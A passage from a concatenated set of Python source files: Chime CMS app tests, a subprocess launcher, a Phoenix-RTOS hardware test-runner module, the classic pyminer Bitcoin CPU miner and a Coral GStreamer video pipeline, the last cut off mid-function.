self.assertTrue('master' in repo.branches)
# delete a category
topic_title = u'Test Topic'
erica.follow_modify_category_link(topic_title)
erica.delete_category()
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the topic's deletion is on the page
self.assertEqual(PATTERN_FLASH_DELETED_CATEGORY.format(title=topic_title, containing=u'(containing 1 topic and 1 article) '), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_delete_article_in_browse_starts_activity(self):
''' Deleting an article from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
erica.open_link(url='/browse/{}/'.format(join(articles_slug, topic_slug, subtopic_slug)))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# delete the article
article_title = u'Test Article'
erica.delete_article(article_title)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the topic's deletion is on the page
self.assertEqual(PATTERN_FLASH_DELETED_ARTICLE.format(title=article_title), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_modify_category_in_browse_starts_activity(self):
''' Modifying a category from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the category folder in browse mode
articles_slug = u'test-articles'
erica.open_link(url='/browse/{}/'.format(articles_slug))
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# edit a category
topic_title = u'Test Topic'
erica.follow_modify_category_link(topic_title)
# make a change
new_title = u'A Fluffy Tail That Stabilizes In Flight'
erica.edit_category(title_str=new_title, description_str=u'The tail acts as an adjunct airfoil, working as an air brake before landing on a tree trunk.')
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the topic's edit is on the page
self.assertEqual(PATTERN_FLASH_SAVED_CATEGORY.format(title=new_title), erica.soup.find('li', class_='flash').text)
# in TestApp
def test_edit_article_in_browse_starts_activity(self):
''' Editing an article from browse view starts a new activity.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in(erica_email)
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email=erica_email)
# Enter the test article edit page in browse mode
articles_slug = u'test-articles'
topic_slug = u'test-topic'
subtopic_slug = u'test-subtopic'
article_slug = u'test-article'
article_url = '/browse/{}'.format(join(articles_slug, topic_slug, subtopic_slug, article_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION)))
erica.open_link(url=article_url)
# there's only the master branch
self.assertEqual(len(repo.branches), 1)
self.assertTrue('master' in repo.branches)
# edit the article
new_title = u'Mostly Hairless, Apart From Their Whiskers'
new_body = u'Their internal organs are visible through the skin.'
erica.edit_article(title_str=new_title, body_str=new_body)
# there is a branch name
branch_name = erica.get_branch_name()
# verify that the branch exists in the repo
self.assertEqual(len(repo.branches), 2)
self.assertTrue(branch_name in repo.branches)
# the branch name is in the path
self.assertTrue(branch_name in erica.path)
# a flash about the article's edit is on the page
self.assertEqual(PATTERN_FLASH_SAVED_ARTICLE.format(title=new_title), erica.soup.find('li', class_='flash').text)
class TestPublishApp (TestCase):
def setUp(self):
self.old_tempdir, tempfile.tempdir = tempfile.tempdir, mkdtemp(prefix='chime-TestPublishApp-')
self.work_path = mkdtemp(prefix='chime-publish-app-')
app_args = {}
self.app = publish.create_app(app_args)
self.client = self.app.test_client()
def tearDown(self):
rmtree(tempfile.tempdir)
tempfile.tempdir = self.old_tempdir
def mock_github_request(self, url, request):
'''
'''
_, host, path, _, _, _ = urlparse(url.geturl())
if (host, path) == ('github.com', '/chimecms/chime-starter/archive/93250f1308daef66c5809fe87fc242d092e61db7.zip'):
return response(302, '', headers={'Location': 'https://codeload.github.com/chimecms/chime-starter/tar.gz/93250f1308daef66c5809fe87fc242d092e61db7'})
if (host, path) == ('codeload.github.com', '/chimecms/chime-starter/tar.gz/93250f1308daef66c5809fe87fc242d092e61db7'):
with open(join(dirname(__file__), '93250f1308daef66c5809fe87fc242d092e61db7.zip')) as file:
return response(200, file.read(), headers={'Content-Type': 'application/zip'})
raise Exception('Unknown URL {}'.format(url.geturl()))
# in TestPublishApp
def test_webhook_post(self):
''' Check basic webhook flow.
'''
payload = '''
{
"head": "93250f1308daef66c5809fe87fc242d092e61db7",
"ref": "refs/heads/master",
"size": 1,
"commits": [
{
"sha": "93250f1308daef66c5809fe87fc242d092e61db7",
"message": "Clean up braces",
"author": {
"name": "Frances Berriman",
"email": "phae@example.com"
},
"url": "https://github.com/chimecms/chime-starter/commit/93250f1308daef66c5809fe87fc242d092e61db7",
"distinct": true
}
]
}
'''
with HTTMock(self.mock_github_request):
response = self.client.post('/', data=payload)
self.assertTrue(response.status_code in range(200, 299))
# in TestPublishApp
def test_load(self):
from chime import publish
''' makes sure that the file loads properly
'''
self.assertIsNotNone(publish.logger)
if __name__ == '__main__':
main()
|
multi-process-launcher.py
|
#!/usr/bin/python3
import argparse
import threading
import subprocess
import sys
import os
import signal
import time
from contextlib import suppress
PROCESS = []
def cli_args():
parser = argparse.ArgumentParser(description='A Python thread/subprocess launcher to group dependent proces launch')
parser.add_argument('-c', '--cmd', action='append', required=True, nargs='+', help='Command to run and its arguments as a single string', metavar="\"/usr/bin/nc -l $PORT0\"")
return parser.parse_args()
def cleanup():
for remaining_process in PROCESS[::-1]:
with suppress(Exception):
os.killpg(os.getpgid(remaining_process.pid), signal.SIGTERM)
time.sleep(2)
with suppress(Exception):
os.killpg(os.getpgid(remaining_process.pid), signal.SIGKILL)
os._exit(10)
def handle_exit(_, __):
cleanup()
def exit_callback(cmd_line):
print('PYTHON_START_WRAPPER: %s exited, killing myself and children' % cmd_line, file=sys.stderr)
cleanup()
def run_in_separe_process(exit_callback, cmd_line):
def run_process(exit_callback, cmd_line):
sub_proc = subprocess.Popen(cmd_line, shell=True, preexec_fn=os.setsid, env=os.environ)
PROCESS.append(sub_proc)
print('PYTHON_START_WRAPPER: %s started as %s' % (cmd_line, sub_proc.pid), file=sys.stderr)
sub_proc.wait()
exit_callback()
return
thread = threading.Thread(target=run_process, args=(lambda: exit_callback(cmd_line), cmd_line))
thread.start()
return thread
if __name__ == '__main__':
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
config = cli_args()
for command in config.cmd:
run_in_separe_process(exit_callback, command)
|
common.py
|
#
# Phoenix-RTOS test runner
#
# Common parts of phoenix-rtos test runners
#
# Copyright 2021 Phoenix SYstems
# Authors: Jakub Sarzyński, Mateusz Niewiadomski, Damian Loewnau
#
import importlib
import logging
import os
import signal
import sys
import threading
import time
import pexpect
import pexpect.fdpexpect
import serial
import subprocess
from pathlib import Path
from trunner.config import PHRTOS_PROJECT_DIR
from trunner.tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
def rootfs(target: str) -> Path:
return PHRTOS_PROJECT_DIR / '_fs' / target / 'root'
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
def wait_for_dev(port, timeout=0):
asleep = 0
# naive wait for dev
while not os.path.exists(port):
time.sleep(0.01)
asleep += 0.01
if timeout and asleep >= timeout:
raise TimeoutError
def power_usb_ports(enable: bool):
uhubctl = subprocess.run([
'uhubctl',
'-l', '2',
'-a', f'{1 if enable else 0}'],
stdout=subprocess.DEVNULL
)
if uhubctl.returncode != 0:
logging.error('uhubctl failed!\n')
raise Exception('RPi usb ports powering up/down failed!')
def unbind_rpi_usb(port_address):
try:
with open('/sys/bus/usb/drivers/usb/unbind', 'w') as file:
file.write(port_address)
except PermissionError:
logging.error("/sys/bus/usb/drivers/usb/unbind: PermissionError\n\
If You launch test runner locally:\n\
Add 'sudo chmod a+w /sys/bus/usb/drivers/usb/unbind' to /etc/rc.local\n\
If You use Docker:\n\
Set the appropriate permissions\n")
sys.exit(1)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::Run psu\n')
while True:
line = self.proc.readline()
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'psu',
[f'{self.script}'],
cwd=self.cwd,
encoding='utf-8'
)
self.read_output()
self.proc.wait()
if self.proc.exitstatus != 0:
logging.error('psu failed!\n')
raise Exception('Flashing IMXRT106x failed!')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
try:
wait_for_dev(self.port, timeout=10)
except TimeoutError as exc:
raise PhoenixdError(f'couldn\'t find {self.port}') from exc
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
output = '::group::phoenixd output\n' + output + '\n::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
# Wait for an eoched command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
class Runner:
"""Common interface for test runners"""
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run test case using serial port"""
def __init__(self, serial):
self.serial_port = serial[0]
self.serial_baudrate = serial[1]
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.serial_port, baudrate=self.serial_baudrate)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.LOW)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
gstreamer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
import time
import numpy as np
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback, render_callback, src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}'%videosrc
if detectCoralDevBoard():
scale_caps = None
PIPELINE += """ ! decodebin ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! freezer name=freezer ! glsvgoverlaysink name=overlaysink
t. ! {leaky_q} ! glfilterbin filter=glbox name=glbox ! {sink_caps} ! {sink_element}
"""
else: # raspberry pi or linux
